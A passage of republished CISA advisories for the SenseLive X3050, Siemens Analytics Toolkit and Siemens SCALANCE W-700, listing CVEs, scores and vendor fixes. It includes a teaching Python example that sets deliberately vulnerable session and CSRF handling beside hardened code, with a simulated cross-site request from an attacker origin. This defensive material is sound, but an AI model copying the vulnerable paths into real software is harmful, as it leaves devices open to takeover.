Metrics: CVSS Version 3.1, Base Score 9.1, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
CVE-2026-40431: A vulnerability exists in the X3050's web management interface due to its reliance on unencrypted HTTP for all administrative communication. Because management traffic, including authentication attempts and configuration data, is transmitted in cleartext, an attacker with access to the same network segment could intercept or observe sensitive operational information.
Relevant CWE: CWE-319 Cleartext Transmission of Sensitive Information
Metrics: CVSS Version 3.1, Base Score 5.3, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE-2026-40623: A vulnerability in the X3050's web management interface allows critical system and network configuration parameters to be modified without sufficient validation and safety controls. Due to inadequate enforcement of constraints on sensitive functions, parameters such as IP addressing, watchdog timers, reconnect intervals, and service ports can be set to unsupported or unsafe values. These configuration changes directly affect core device behaviour and recovery mechanisms. The lack of proper validation and safeguards allows critical system functions to be altered in a manner that can destabilize device operation or render the device persistently unavailable.
Relevant CWE: CWE-862 Missing Authorization
Metrics: CVSS Version 3.1, Base Score 8.1, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
CVE-2026-27841: A vulnerability in the X3050's web management interface allows state-changing operations to be triggered without proper Cross-Site Request Forgery (CSRF) protections. Because the application does not enforce server-side validation of request origin or implement CSRF tokens, a malicious external webpage could cause a user's browser to submit unauthorized configuration requests to the device.
Relevant CWE: CWE-352 Cross-Site Request Forgery (CSRF)
Metrics: CVSS Version 3.1, Base Score 8.1, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
CVE-2026-40620: A vulnerability in the X3050's embedded management service allows full administrative control to be established without any form of authentication or authorization on the SenseLive config application. The service accepts management connections from any reachable host, enabling unrestricted modification of critical configuration parameters, operational modes, and device state through a vendor-supplied or compatible client.
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS Version 3.1, Base Score 9.8, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2026-35064: A vulnerability in the X3050's management ecosystem allows unauthenticated discovery of deployed units through the vendor's management protocol, enabling identification of device presence, identifiers, and management interfaces without requiring credentials. Because discovery functions are exposed by the underlying service rather than gated by authentication, an attacker on the same network segment can rapidly enumerate targeted devices.
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE-2026-25775: A vulnerability in the X3050's remote management service allows firmware retrieval and update operations to be performed without authentication or authorization. The service accepts firmware-related requests from any reachable host and does not verify user privileges, integrity of uploaded images, or the authenticity of provided firmware.
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS Version 3.1, Base Score 9.8, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Acknowledgments: Jithin Nambiar J reported these vulnerabilities to CISA.
Legal Notice and Terms of Use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).
Recommended Practices: CISA's standard defensive measures for control systems and against social engineering apply to this advisory; they are reproduced in full under the Silex Technology SD-330AC and AMC Manager advisory above and at cisa.gov/ics.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
Revision History
Initial Release Date: 2026-04-21
2026-04-21, Revision 1: Initial Publication
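Two of the X3050 findings, CVE-2026-25720 (sessions that never expire) and CVE-2026-27841 (no request-origin check and no CSRF token), are controls that only the server side of a management interface can enforce. The following added example is written for this page and is not SenseLive's code; it shows both controls in one small Python model: the *_vulnerable paths behave as the advisory describes, and the hardened paths add idle and absolute session lifetimes, an Origin allow-list, and a per-session CSRF token compared in constant time. The timeout values, the trusted origin https://gateway.example.local, the attacker origin, the form field names and the injectable clock are all assumptions made for the example, not X3050 behaviour.

```python
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Optional

# Policy values and origins are assumptions for this example, not SenseLive settings.
IDLE_TIMEOUT = 15 * 60
ABSOLUTE_TIMEOUT = 8 * 60 * 60
TRUSTED_ORIGINS = {"https://gateway.example.local"}


@dataclass
class Session:
    user: str
    created: float
    last_seen: float
    csrf_token: str


class SessionStore:
    """Server-side session table; `clock` is injectable so expiry can be exercised offline."""

    def __init__(self, clock: Callable[[], float] = time.time):
        self.clock = clock
        self._sessions: dict[str, Session] = {}

    def login(self, user: str) -> tuple[str, str]:
        now = self.clock()
        sid, token = secrets.token_urlsafe(32), secrets.token_urlsafe(32)
        self._sessions[sid] = Session(user, now, now, token)
        return sid, token

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)

    def resolve_vulnerable(self, sid: Optional[str]) -> Optional[Session]:
        """Modelled on CVE-2026-25720: a session stays valid for as long as the server runs."""
        return self._sessions.get(sid)

    def resolve(self, sid: Optional[str]) -> Optional[Session]:
        """Hardened: idle and absolute lifetimes are enforced and a stale session is destroyed."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s.last_seen > IDLE_TIMEOUT or now - s.created > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        s.last_seen = now
        return s


@dataclass
class Request:
    method: str
    cookie_sid: Optional[str]
    origin: Optional[str]  # Origin header as the browser sends it
    form: dict


def apply_config_vulnerable(store, req, config) -> int:
    """Modelled on CVE-2026-27841: a live cookie is all that is needed to change settings, so a
    page on any other site can make the administrator's browser submit this request."""
    if store.resolve_vulnerable(req.cookie_sid) is None:
        return 401
    config.update(req.form)
    return 200


def apply_config(store, req, config) -> int:
    """Hardened: state changes only on POST, from a trusted Origin, with a token bound to the session."""
    s = store.resolve(req.cookie_sid)
    if s is None:
        return 401
    if req.method != "POST":
        return 405
    if req.origin not in TRUSTED_ORIGINS:
        return 403
    if not hmac.compare_digest(req.form.get("csrf_token", ""), s.csrf_token):
        return 403
    config.update({k: v for k, v in req.form.items() if k != "csrf_token"})
    return 200


class FakeClock:
    def __init__(self, start: float = 1_700_000_000.0):
        self.now = start

    def __call__(self) -> float:
        return self.now


def demo():
    """Constructed scenario: an administrator logs in; a cross-site page submits a watchdog change;
    the administrator submits a legitimate change; after the idle timeout the cross-site request
    is replayed and the legitimate one is retried. Returns the five status codes (vulnerable
    cross-site, hardened cross-site, hardened legitimate, vulnerable stale, hardened stale) and
    the two resulting configs."""
    clock = FakeClock()
    store = SessionStore(clock)
    sid, token = store.login("admin")
    vuln_cfg, hard_cfg = {"watchdog_seconds": "60"}, {"watchdog_seconds": "60"}

    cross_site = Request("POST", sid, "https://attacker.example", {"watchdog_seconds": "0"})
    legit = Request("POST", sid, "https://gateway.example.local",
                    {"watchdog_seconds": "30", "csrf_token": token})

    r1 = apply_config_vulnerable(store, cross_site, vuln_cfg)
    r2 = apply_config(store, cross_site, hard_cfg)
    r3 = apply_config(store, legit, hard_cfg)

    clock.now += IDLE_TIMEOUT + 1
    r4 = apply_config_vulnerable(store, cross_site, vuln_cfg)
    r5 = apply_config(store, legit, hard_cfg)
    return (r1, r2, r3, r4, r5), vuln_cfg, hard_cfg


if __name__ == "__main__":
    print(demo())
```

The Origin check and the token are deliberately both present: the Origin header is absent on some non-browser clients and can be stripped by privacy tooling, while the token alone does not protect a device whose pages are served over plain HTTP (CVE-2026-40431) from an on-path attacker who can read it. Neither control helps against CVE-2026-40620 or CVE-2026-25775, where the management service needs authentication in the first place.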

Siemens Analytics Toolkit

View CSAF Summary Multiple Siemens applications are affected by improper certificate validation in Siemens Analytics Toolkit. This could allow an unauthenticated remote attacker to perform man in the middle attacks. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Analytics Toolkit are affected: Siemens Software Center vers:intdot/<3.5.8.2 (CVE-2025-40745) Simcenter 3D vers:intdot/<2506.6000 (CVE-2025-40745) Simcenter Femap vers:intdot/<2506.0002 (CVE-2025-40745) Simcenter STAR-CCM+ vers:intdot/<2602 (CVE-2025-40745) Solid Edge SE2025 Solid Edge SE2026 Tecnomatix Plant Simulation vers:intdot/<2504.0008 (CVE-2025-40745) CVSS Vendor Equipment Vulnerabilities v3 3.7 Siemens Siemens Analytics Toolkit Improper Certificate Validation Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-40745 Affected applications do not properly validate client certificates to connect to Analytics Service endpoint. This could allow an unauthenticated remote attacker to perform man in the middle attacks. 
View CVE Details Affected Products Siemens Analytics Toolkit Vendor: Siemens Product Version: Siemens Software Center, Simcenter 3D, Simcenter Femap, Simcenter STAR-CCM+, Solid Edge SE2025, Solid Edge SE2026, Tecnomatix Plant Simulation Product Status: known_affected Remediations Vendor fix Update to V225.0 Update 13 or later version https://support.sw.siemens.com/product/246738425/ Vendor fix Update to V226.0 Update 04 or later version https://support.sw.siemens.com/product/246738425/ Vendor fix Update to V2504.0008 or later version https://support.sw.siemens.com/product/297028302/ Vendor fix Update to V2506.0002 or later version https://support.sw.siemens.com/product/275652363/ Vendor fix Update to V2506.6000 or later version https://support.sw.siemens.com/product/289054037/ Vendor fix Update to V2602 or later version https://support.sw.siemens.com/product/226870983/ Vendor fix Update to V3.5.8.2 or later version https://www.sw.siemens.com/en-US/siemens-software-center/ Relevant CWE: CWE-295 Improper Certificate Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. 
Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. 
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-981622 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-04-14
Revision 1 (2026-04-14): Publication Date
Revision 2 (2026-04-21): Initial CISA Republication of Siemens ProductCERT SSA-981622 advisory

Siemens SCALANCE

Summary
SCALANCE W-700 IEEE 802.11n family devices before V6.6.0 are affected by multiple vulnerabilities. Siemens has released a new version for the SCALANCE W-700 IEEE 802.11n family and recommends updating to the latest version.

The following versions of Siemens SCALANCE are affected. Every product below is affected at vers:intdot/<6.6.0 by the same set of vulnerabilities: CVE-2020-24588, CVE-2020-26139, CVE-2020-26140, CVE-2020-26141, CVE-2020-26143, CVE-2020-26144, CVE-2020-26146, CVE-2020-26147, CVE-2021-3712, CVE-2022-0778, CVE-2022-31765, CVE-2022-36323, CVE-2022-36324, CVE-2022-36325, CVE-2023-44373.

- SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0)
- SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0)
- SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0)
- SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0)
- SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0)
- SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0)
- SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6)
- SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0)
- SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6)
- SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0)
- SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0)
- SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0)
- SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0)
- SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0)
- SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0)
- SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0)
- SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0)
- SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0)
- SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0)
- SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0)
- SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6)
- SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0)
- SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0)
- SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6)
- SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0)
- SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0)
- SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0)
- SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0)
- SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0)
- SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0)
- SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0)
- SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0)
- SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0)
- SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0)
- SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0)
- SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0)
- SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0)
- SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0)
- SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0)
- SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0)
- SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0)
- SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0)
- SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0)
- SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0)
- SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0)
- SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0)
- SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0)
- SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0)
- SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0)

CVSS v3: 9.1
Vendor: Siemens
Equipment: Siemens SCALANCE
Vulnerabilities: Missing Authentication for Critical Function, Improper Authentication, Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'), Improper Validation of Integrity Check Value, Improper Input Validation, Out-of-bounds Read, Loop with Unreachable Exit Condition ('Infinite Loop'), Missing Authorization, Allocation of Resources Without Limits or Throttling, Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

Background
Critical Infrastructure Sectors: Communications, Information Technology, Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2020-24588
The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn't require that the A-MSDU flag in the plaintext QoS header field is authenticated. Against devices that support receiving non-SSP A-MSDU frames (which is mandatory as part of 802.11n), an adversary can abuse this to inject arbitrary network packets.

Affected Products
Siemens SCALANCE
Vendor: Siemens
Product Version: all SCALANCE W-700 IEEE 802.11n family products listed in the Summary above
Product Status: known_affected

Remediations
Mitigation: As these vulnerabilities can only be exploited within Wi-Fi range, reduce Wi-Fi transmission power where possible, or keep the devices in private areas with physical access controls.
Mitigation: Disable A-MSDU, if possible.
Vendor fix: Update to V6.6.0 or later version. https://support.industry.siemens.com/cs/ww/en/view/109996102/

Relevant CWE: CWE-306 Missing Authentication for Critical Function

Metrics
CVSS Version: 3.1
Base Score: 3.5
Base Severity: LOW
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVE-2020-26139
An issue was discovered in the kernel in NetBSD 7.1. An Access Point (AP) forwards EAPOL frames to other clients even though the sender has not yet successfully authenticated to the AP. This might be abused in protected Wi-Fi networks to launch denial-of-service attacks against connected clients and makes it easier to exploit other vulnerabilities in connected clients.
Affected Products
Siemens SCALANCE
Vendor: Siemens
Product Version: all SCALANCE W-700 IEEE 802.11n family products listed in the Summary above
Product Status: known_affected

Remediations
Mitigation: As these vulnerabilities can only be exploited within Wi-Fi range, reduce Wi-Fi transmission power where possible, or keep the devices in private areas with physical access controls.
Vendor fix: Update to V6.6.0 or later version. https://support.industry.siemens.com/cs/ww/en/view/109996102/

Relevant CWE: CWE-287 Improper Authentication

Metrics
CVSS Version: 3.1
Base Score: 5.3
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-26140
An issue was discovered in the ALFA Windows 10 driver 6.1316.1209 for AWUS036H. The WEP, WPA, WPA2, and WPA3 implementations accept plaintext frames in a protected Wi-Fi network. An adversary can abuse this to inject arbitrary data frames independent of the network configuration.
Affected Products
Siemens SCALANCE
Vendor: Siemens
Product Version: all SCALANCE W-700 IEEE 802.11n family products listed in the Summary above
Product Status: known_affected

Remediations
Mitigation: As these vulnerabilities can only be exploited within Wi-Fi range, reduce Wi-Fi transmission power where possible, or keep the devices in private areas with physical access controls.
Vendor fix: Update to V6.6.0 or later version. https://support.industry.siemens.com/cs/ww/en/view/109996102/

Relevant CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

Metrics
CVSS Version: 3.1
Base Score: 6.5
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-26141
An issue was discovered in the ALFA Windows 10 driver 6.1316.1209 for AWUS036H. The Wi-Fi implementation does not verify the Message Integrity Check (authenticity) of fragmented TKIP frames. An adversary can abuse this to inject and possibly decrypt packets in WPA or WPA2 networks that support the TKIP data-confidentiality protocol.
Affected Products
Siemens SCALANCE
Vendor: Siemens
Product Version: all SCALANCE W-700 IEEE 802.11n family products listed in the Summary above
Product Status: known_affected

Remediations
Mitigation: As these vulnerabilities can only be exploited within Wi-Fi range, reduce Wi-Fi transmission power where possible, or keep the devices in private areas with physical access controls.
Vendor fix: Update to V6.6.0 or later version. https://support.industry.siemens.com/cs/ww/en/view/109996102/

Relevant CWE: CWE-354 Improper Validation of Integrity Check Value

Metrics
CVSS Version: 3.1
Base Score: 6.5
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-26143
An issue was discovered in the ALFA Windows 10 driver 1030.36.604 for AWUS036ACH. The WEP, WPA, WPA2, and WPA3 implementations accept fragmented plaintext frames in a protected Wi-Fi network. An adversary can abuse this to inject arbitrary data frames independent of the network configuration.
Affected Products
Siemens SCALANCE
Vendor: Siemens
Product Version: all SCALANCE W-700 IEEE 802.11n family products listed in the Summary above
Product Status: known_affected

Remediations
Mitigation: As these vulnerabilities can only be exploited within Wi-Fi range, reduce Wi-Fi transmission power where possible, or keep the devices in private areas with physical access controls.
Vendor fix: Update to V6.6.0 or later version. https://support.industry.siemens.com/cs/ww/en/view/109996102/

Relevant CWE: CWE-20 Improper Input Validation

Metrics
CVSS Version: 3.1
Base Score: 6.5
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-26144
An issue was discovered on Samsung Galaxy S3 i9305 4.4.4 devices. The WEP, WPA, WPA2, and WPA3 implementations accept plaintext A-MSDU frames as long as the first 8 bytes correspond to a valid RFC1042 (i.e., LLC/SNAP) header for EAPOL. An adversary can abuse this to inject arbitrary network packets independent of the network configuration.
Affected Products: Siemens SCALANCE
Vendor: Siemens
Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Mitigation: As these vulnerabilities can only be exploited within Wi-Fi range, where possible reduce Wi-Fi transmission power or keep the devices in private areas with physical access controls.
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS version 3.1, base score 6.5 (MEDIUM), vector string CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-26146
An issue was discovered on Samsung Galaxy S3 i9305 4.4.4 devices. The WPA, WPA2, and WPA3 implementations reassemble fragments with non-consecutive packet numbers. An adversary can abuse this to exfiltrate selected fragments. This vulnerability is exploitable when another device sends fragmented frames and the WEP, CCMP, or GCMP data-confidentiality protocol is used. Note that WEP is vulnerable to this attack by design.
Affected Products: Siemens SCALANCE
Vendor: Siemens
Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Mitigation: As these vulnerabilities can only be exploited within Wi-Fi range, where possible reduce Wi-Fi transmission power or keep the devices in private areas with physical access controls.
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS version 3.1, base score 5.3 (MEDIUM), vector string CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-26147
An issue was discovered in the Linux kernel 5.8.9. The WEP, WPA, WPA2, and WPA3 implementations reassemble fragments even though some of them were sent in plaintext. This vulnerability can be abused to inject packets and/or exfiltrate selected fragments when another device sends fragmented frames and the WEP, CCMP, or GCMP data-confidentiality protocol is used.
Affected Products: Siemens SCALANCE
Vendor: Siemens
Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Mitigation: As these vulnerabilities can only be exploited within Wi-Fi range, where possible reduce Wi-Fi transmission power or keep the devices in private areas with physical access controls.
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS version 3.1, base score 5.4 (MEDIUM), vector string CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:N

CVE-2021-3712
ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings, which are represented as a buffer for the string data terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions), as well as any string whose value has been set with the ASN1_STRING_set() function, will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array, by directly setting the "data" and "length" fields in the ASN1_STRING structure. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed.

Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non-NUL-terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions, then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).
Affected Products: Siemens SCALANCE
Vendor: Siemens
Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS version 3.1, base score 7.4 (HIGH), vector string CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H

CVE-2022-0778
The BN_mod_sqrt() function in OpenSSL, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys, as they can contain explicit elliptic curve parameters.
Affected Products: Siemens SCALANCE
Vendor: Siemens
Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
Metrics: CVSS version 3.1, base score 7.5 (HIGH), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-31765
Affected devices do not properly authorize the change password function of the web interface. This could allow low privileged users to escalate their privileges.
Affected Products: Siemens SCALANCE
Vendor: Siemens
Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-862 Missing Authorization
Metrics: CVSS version 3.1, base score 8.8 (HIGH), vector string CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

CVE-2022-36323
Affected devices do not properly sanitize an input field. This could allow an authenticated remote attacker with administrative privileges to inject code or spawn a system root shell.
Affected Products: Siemens SCALANCE
Vendor: Siemens
Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Metrics: CVSS version 3.1, base score 9.1 (CRITICAL), vector string CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C

CVE-2022-36324
Affected devices do not properly handle the renegotiation of SSL/TLS parameters. This could allow an unauthenticated remote attacker to bypass the TCP brute force prevention and lead to a denial of service condition for the duration of the attack.
Affected Products: Siemens SCALANCE
Vendor: Siemens
Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling
Metrics: CVSS version 3.1, base score 7.5 (HIGH), vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C

CVE-2022-36325
Affected devices do not properly sanitize data introduced by a user when rendering the web interface. This could allow an authenticated remote attacker with administrative privileges to inject code and lead to a DOM-based XSS.
Affected Products: Siemens SCALANCE
Vendor: Siemens
Product Version: the same SCALANCE product list as given for the first CVE above (identical for every CVE in this advisory)
Product Status: known_affected
Remediations:
Vendor fix: Update to V6.6.0 or a later version (https://support.industry.siemens.com/cs/ww/en/view/109996102/).
Relevant CWE: CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
Metrics: CVSS version 3.1, base score 6.8 (MEDIUM), vector string CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

CVE-2023-44373
Affected devices do not properly sanitize an input field. This could allow an authenticated remote attacker with administrative privileges to inject code or spawn a system root shell. Follow-up of CVE-2022-36323.
Affected Products: Siemens SCALANCE
Vendor: Siemens
